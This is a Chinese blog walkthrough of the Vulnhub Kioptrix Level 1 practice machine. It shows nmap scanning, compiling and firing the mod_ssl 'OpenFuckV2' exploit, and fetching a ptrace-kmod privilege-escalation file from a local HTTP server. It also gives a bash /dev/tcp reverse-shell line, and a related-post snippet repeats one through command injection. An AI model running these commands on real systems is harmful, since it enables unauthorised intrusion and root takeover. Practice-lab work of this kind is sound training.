【Vulnhub靶场】Kioptrix Level 1

已于 2024-10-23 03:51:37 修改
阅读量667 收藏 10
点赞数 20
分类专栏: VulnHub渗透测试靶场 文章标签: Vulnhub靶场 渗透测试 漏洞
于 2024-10-15 22:13:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_73442302/article/details/142953629
版权

靶场下载地址

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

一、信息收集

1. 扫存活主机

nmap -sP 192.168.118.0/24

本机IP 为192.168.118.128

分析得靶机IP为 192.168.118.129

2. 扫全端口

nmap -p- 192.168.118.129

3. 服务详情扫描 

nmap -sV -A 192.168.118.129

发现开放的443端口,其中Apache/1.3.20,版本过低,可查找mod_ssl 漏洞

 二、漏洞发现

1. 查找 mod_ssl 漏洞

searchsploit mod_ssl

2. 漏洞版本 

https://www.exploit-db.com(漏洞库)中查找,使用最新漏洞利用:

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)      unix/remote/47080.c

三、漏洞利用

1. 获取漏洞脚本

漏洞路径查询,当前路径查询,把脚本拷贝到当前桌面

locate unix/remote/47080.c

pwd

cp /usr/share/exploitdb/exploits/unix/remote/47080.c /root/Desktop

查看此脚本文件

发现需要安装相关依赖,编译,已给出相关利用指令

2. 使用脚本文件

安装依赖,编译

apt-get install libssl-dev

gcc -o 47080 47080.c -lcrypto

 使用脚本文件

./文件名     显示文件使用说明

 找到对应版本,尝试利用此脚本

./47080 0x6b 192.168.233.131 443 -c 40

此时发现已经得到 Shell ,输入 whoami 尝试 ,发现只是普通用户

观察发现是 ptrace-kmod.c 文件获取失败

在给出的网址中下载  ptrace-kmod.c 到本地桌面,查看发现此文件为提权脚本文件

四、提权

1. kali 本机下载目标提权脚本 

kali本机下载目标提权脚本:

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

2. 远程下载

在本地启动HTTP服务器,在目标中下载本地文件 ptrace-kmod.c并编译,然后重新利用漏洞,然后测试发现提权成功,获得root权限。

python -m http.server 80

wget 192.168.118.128/ptrace-kmod.c

3. Bash反弹Shell 

nc -lvvp 6666

bash -i >& /dev/tcp/192.168.118.128/6666 0>&1

vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 749
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
vulnhub靶场/Kioptrix Level-1.2
qq_45230030的博客
04-18 525
基本是按下载地址中的顺序打的,第二个下载地址:GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。
kioptrix-level-1
热门推荐
cxyzupup的博客
01-10 1万+
kioptrix-level-1-1,22 项目地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22 提示:靶机网络连接方式使用NAT模式。 文章目录kioptrix-level-1-1,22一、信息收集1. 使用fping工具查找靶机IP:2. 使用nmap对目标主机端口进行枚举:二、信息利用1. 查看80端口:2. 查看443端口:总结 一、信息收集 1. 使用fping工具查找靶机IP: 命令如下: kali@kali:~/Desktop$ fp
Kioptrix Level 1靶机通关
nanncy_ma的博客
12-18 506
利用searchsploit Samba 2.2.1a 查看相关版本的samba是否存在漏洞。如果你的vmware是16版本的,记得改VirtualHW.version=“16”(img-iWu3wpkU-1702871600130)]4.重新导入虚拟机,并重新添加网络适配器,修改其模式为NAT。3.下载完靶机后,先把.vmx 文件里删除所有以。开放了samba服务,先从这里入手看下。用msf查看一下samba的版本。,注意并不是从磁盘删除!开头的条目并保存更改。5.确定保存,修改完成。
vulnhub——Kioptrix Level 1靶机】
jieli0901227的博客
05-26 717
找到samba 版本信息,通过https://www.exploit-db.com/ 漏洞利用库 查找这个版本有个远程代码执行漏洞,我们试试。Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。下载的文件解压后,编辑 Kioptix Level 1.vmx 文件,删除以 ethernet0开头的行,并保存,发现 MRTG 2.9.6 可能是个应用, 搜索版本可能存在的漏洞,,没有可利用的信息。那么我们尝试这个版本漏洞搜索。
Kioptrix Level 1 古老的 Apache&KVM1靶场练习
jockerboss的博客
02-27 1017
小白也能看懂的vulnhub KioptrixVM1 靶场练习&KVM1练习 渗透实战
Vulnhub-靶机-Kioptrix: Level 1 (#1)
qq_43264813的博客
01-28 715
Vulnhub—靶机—Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机—Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.4
Vulnhub靶场 Kioptrix: Level 1.1 (#2) 练习
Reset
01-13 824
netdiscover探测目标主机ip。nmap探测开放的端口和服务。扫描站点目录。从站点查看相关组件的版本信息。利用万能密码进行SQL注入登录到后台。发现系统命令执行功能点。利用系统命令执行功能点进行反弹shell。查看系统版本,centos 4.5。利用系统内核漏洞进行提权。
Vulnhub靶场 Kioptrix: Level 1 (#1) 练习
Reset
12-06 743
netdiscover探测目标主机ip。nmap探测开放的端口和服务。扫描站点目录。从站点查看相关组件的版本信息。方法一:mod_ssl 2.8.4a. 利用 nikto 扫描是否有可用漏洞。b. 编译脚本,处理报错。方法二:CVE-2003-0201a. 利用 msf 探测 samba 版本发现相关漏洞。b. 在 msf 中利用该 CVE 进行攻击。方法三:Sambaa. 利用 searchsploit 中的脚本进行攻击。
Vulnhub靶机:Kioptrix_Level1.3
qq_48904485的博客
03-17 589
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1.3(192.168.56.109)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25安装虚拟机:由于下载下来的压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘选择自定义安装操作系统选择linux,版本随便选一个,其他默认即可。
oscp——Kioptrix: Level 1 (#1)
王嘟嘟的博客
01-31 1153
0x00 前言 这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下 链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 0x01 信息收集 1.IP 2.端口 0x02 攻击 1.端口 这里可以看到80端口开放了OpenSSL 使用nikto进行扫描(我记得oscp考试貌似不让使用工具) nikto -host 192....
Kioptrix: Level 1 (#1)漏洞方法
Abc_Kimball的博客
11-07 681
Kioptrix: Level 1 (#1) 官方网址 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 攻击机kali linux 方法一: ifcoonfig查看本地ip地址 查看网段地址信息,发现192.168.43.64为靶机 nmap 192.168.43.64 -O -sS -sV -v查看开启的端口及服务信息 dirb http://192.168.43.64 查看目标有哪些路径,这里未发现可利用信息 nikto -h
Vulnhub系列:Kioptix Level 1
Fuzz
07-30 1890
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为0SCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 运行环境 kali:192.168.44.128 靶机:NAT模式 特别说明:有的小伙伴在打开虚拟机后,无法获取到靶机IP地址 这里特别说明:修改“Kioptix Level 1.vmx”配置文件中ethernet0.networkN
Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录
weixin_45509443的博客
06-19 529
环境:靶机:192.168.1.107 kali:192.168.106 主机发现 端口扫描 浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录 成功进入,经典ping命令,存在命令执行 kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到kali攻击机 成功反弹但不是root权限,开始...
DeepSeek本地部署及WebUI可视化教程
最新发布
06-04
DeepSeek是近年来备受关注的大模型之一,支持多种推理和微调场景。很多开发者希望在本地部署DeepSeek模型,并通过WebUI进行可视化交互。本文将详细介绍如何在本地环境下部署DeepSeek,并实现WebUI可视化,包括Ollama和CherryStudio的使用方法。
物体音效-锻炼-音效素材.zip
06-04
物体音效-锻炼-音效素材.zip
业务流程的标准化管理.ppt
06-04
业务流程的标准化管理.ppt
拟声-交通工具-飞机投炸弹声-音效素材.zip
06-04
拟声-交通工具-飞机投炸弹声-音效素材.zip
紧张恐怖音效-鬼叫-音效素材.zip
06-04
紧张恐怖音效-鬼叫-音效素材.zip
嵌入式lLinux驱动开发和嵌入式Linux应用开发的区别
04-11
### 嵌入式Linux驱动开发与应用开发的区别 #### 1. 开发目标的不同 嵌入式Linux驱动开发的目标是对底层硬件进行控制和管理,使得上层软件能够通过标准接口访问硬件资源。这通常涉及对特定芯片、外设或传感器的支持[^4]。而嵌入式Linux应用开发则侧重于实现具体的业务逻辑和服务功能,利用已有的硬件支持来完成用户需求的任务。 #### 2. 技术栈差异 - **驱动开发**:需要深入理解硬件的工作机制以及Linux内核的架构设计。开发者需熟悉设备树(Device Tree)、中断处理、内存映射等核心技术,并掌握如何编写符合内核规范的驱动代码[^1]。 - **应用开发**:主要依赖于高层库和框架,专注于算法实现、图形界面构建或者网络通信等功能模块的设计。它更多关注的是用户体验优化及功能性增强而非直接操控物理器件[^3]。 #### 3. 编程环境对比 对于驱动程序员来说,他们往往是在宿主机(Host Machine)上交叉编译源码后再传送到目标板(Target Board)上去测试;而且由于涉及到修改内核部分所以每次改动都需要重新制作镜像并刷机验证效果[^2]。相比之下应用程序员可以直接在目标平台上部署其作品并通过常规手段如gcc/g++来进行本地编译执行即可得到即时反馈无需经历如此繁琐的过程。 #### 4. 调试难度考量 鉴于驱动处于整个计算体系最底下一层靠近真实世界信号交互之处因此任何错误都可能导致系统崩溃甚至损坏硬件组件从而增加了排查问题根源时所需耗费的时间成本和技术门槛;另外因为很多情况下无法借助传统意义上的打印日志方法来进行诊断故此还需要学会运用诸如kgdb/qemu仿真工具之类的特殊技巧辅助定位缺陷所在位置[^4]。相对而言尽管应用程序也可能存在难以解决的技术挑战但总体来讲还是比前者简单得多毕竟它们远离了那些复杂难懂且容易出错的基础建设层面的东西。 ```c // 示例:简单的字符设备驱动程序片段 static int __init my_driver_init(void){ printk(KERN_INFO "Loading My Driver\n"); return 0; } module_init(my_driver_init); ``` ```python # 示例:Python脚本作为嵌入式Linux上的一个典型应用实例 import os print("This is an example of embedded Linux application.") os.system('ls /') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow_143

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值